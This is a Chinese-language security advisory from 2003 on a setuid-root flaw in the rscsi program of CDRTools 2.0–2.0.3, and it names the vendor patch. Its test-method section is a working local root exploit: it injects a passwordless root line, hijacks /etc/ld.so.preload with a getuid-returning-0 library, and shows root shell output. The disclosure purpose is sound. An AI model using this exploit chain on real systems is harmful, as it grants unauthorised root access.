信息提供: | 安全公告(或线索)提供热线:51cto.editor@gmail.com |
漏洞类别: | 设计错误 |
攻击类型: | 拒绝服务攻击 |
发布日期: | 2003-08-01 |
更新日期: | 2003-08-06 |
受影响系统: | CDRTools CDRTools 2.0.3 CDRTools CDRTools 2.0 |
安全系统: | CDRTools CDRTools 2.01a18 |
漏洞报告人: | Strategic Reconnaissance Team (research@secnetops.com) |
漏洞描述: | BUGTRAQ ID: 8328 Cdrecord刻录程序支持大部分DVD-RW设备。 Cdrecord包含的rscsi程序可破坏攻击者指定文件的组属性,本地攻击者可以利用这个漏洞进行权限提升。 rscsi程序默认以setuid root权限安装,此程序可以修改和破坏文件的属组,因此攻击者可以调用这个程序对本地系统进行拒绝服务或获得root用户权限。 |
测试方法: | 警 告 $ echo C`echo -e "\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08r00t::0:0:root:/:/bin/bash\x0a"` | /opt/schily/sbin/rscsi /tmp/lala [kf@vegeta kf]$ ls -al /etc/ld.so.preload ls: /etc/ld.so.preload: No such file or directory [kf@vegeta kf]$ cat > oops.c int getuid(void) { return(0); } [kf@vegeta kf]$ gcc -c -o oops.o oops.c [kf@vegeta kf]$ ld -shared -o oops.so oops.o [kf@vegeta kf]$ ls -al oops.so -rwxrwxr-x 1 kf kf 1714 Jul 30 18:53 oops.so [kf@vegeta kf]$ echo duh_kf | /opt/schily/sbin/rscsi /etc/ld.so.preload E0 Garbage command 0 -rw-rw-r-- 1 root kf 1 Jul 30 19:29 /etc/ld.so.preload [kf@vegeta kf]$ echo /home/kf/oops.so > /etc/ld.so.preload [kf@vegeta kf]$ su [root@vegeta kf]# rm /etc/ld.so.preload rm: remove regular file `/etc/ld.so.preload'? y [root@vegeta kf]# id uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) |
解决方法: | 厂商补丁: CDRTools -------- 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: cdrtools Upgrade cdrtools 2.01a18 (Development) http://freshmeat.net/releases/131136/ |
相关文章
